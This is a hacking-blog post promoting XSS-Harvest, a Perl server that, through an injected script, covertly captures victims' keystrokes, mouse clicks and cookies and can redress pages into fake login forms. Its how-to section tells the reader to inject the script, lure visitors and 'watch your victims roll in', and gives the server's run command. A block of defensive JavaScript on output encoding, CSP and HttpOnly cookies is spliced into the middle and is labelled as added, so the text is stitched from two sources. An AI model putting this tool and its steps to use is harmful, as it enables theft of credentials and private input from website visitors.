Hack Your Mind Right Now....!

XSS-Harvest

Posted by Unknown at 2:53 PM
 Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies

Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affected domain, regardless of whether the vulnerability is “reflected” or “persistent”.

XSS-Harvest is a multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.


  Functionality of xss-harvest:


    * Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
    * Any key entered will be sent covertly to the server.
    * Any mouse click performed will be analysed and the data covertly sent to the server.
    * Optionally ‘redress’ the vulnerable page to display a different page on the same subdomain – e.g. a login form.
    * If redressing the victim’s browser, allow subsequently loaded pages to be also ‘infected’ – assuming they don’t break the same-origin policy (i.e. they’re on the same subdomain).
    * Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
    * Each victim has a separate history file containing all events, cookies and keystrokes.
    * Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid confusion).
    * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
    * Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.
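
Seen from the defending side, the capabilities listed above depend on three things: injected markup reaching the page unencoded, the browser being allowed to run script and send data beyond the site's own origin, and cookies being readable from script. The following is an added example, not code from XSS-Harvest or from the original post; the function names and the `session` cookie name are assumptions. It shows a reflecting page before and after output encoding, the response headers that limit the damage if an injection point is missed, and a small check for those headers.

```javascript
// Added example; all names here are hypothetical.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
// Probe string quoted in the post, used here only as test input.
const SAMPLE = '<script>alert(1)</script>';

// Encode untrusted text for an HTML element or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESC[ch]);
}

// Before: the parameter is reflected verbatim, so markup in it becomes live.
function renderVulnerable(q) {
  return `<p>Results for ${q}</p>`;
}

// After: the same page with the parameter encoded on output.
function renderHardened(q) {
  return `<p>Results for ${escapeHtml(q)}</p>`;
}

// Response headers that limit the impact of a missed injection point.
function securityHeaders(sessionId) {
  if (!/^[A-Za-z0-9_-]+$/.test(sessionId)) throw new Error('invalid session id');
  return {
    // script-src: no inline script and no script from another host.
    // connect-src / img-src: XHR, fetch and image requests stay on our origin.
    // frame-ancestors: the page refuses to be framed.
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; connect-src 'self'; " +
      "img-src 'self'; frame-ancestors 'none'",
    // HttpOnly keeps the session cookie out of document.cookie.
    'Set-Cookie': `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`,
  };
}

// Check a response's headers for the protections above; returns a list of gaps.
function auditHeaders(headers) {
  const gaps = [];
  const csp = headers['Content-Security-Policy'] || '';
  const cookie = headers['Set-Cookie'] || '';
  const directives = csp.split(';').map((d) => d.trim());
  const scriptSrc = directives.find((d) => d.startsWith('script-src '))
    || directives.find((d) => d.startsWith('default-src ')) || '';
  if (!scriptSrc) gaps.push('no CSP restricting script sources');
  else if (/'unsafe-inline'|\*|\bhttps?:/.test(scriptSrc)) gaps.push('script-src allows inline or remote script');
  if (cookie && !/;\s*HttpOnly/i.test(cookie)) gaps.push('session cookie readable by script');
  return gaps;
}
```

Output encoding is the fix for the vulnerability itself; the headers are a second layer and do not replace it.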

How to Exploit XSS with XSS-Harvest
Identify a page vulnerable to XSS (reflected or persistent will be fine – unless the victim is running IE9 or another plugin such as NoScript).

Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags into the source of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage to ensure the page is actually vulnerable.

Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.

Insert the following ‘injection string’ into the vulnerable page:
<script src=”>

This will return the client-side JavaScript to the victim, indicated by the ‘i’ in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in – a new history file will be created for each new victim.
To make use of the redress function, start the server with the -r parameter:

./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

Basic dependencies:
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork

About The Author

Aman Badhania writes this blog to help computer users with problems related to web services and getting the most out of their own websites.
Copyright © 2012 Hack Your Mind Right Now....! - and Deadly Hacker.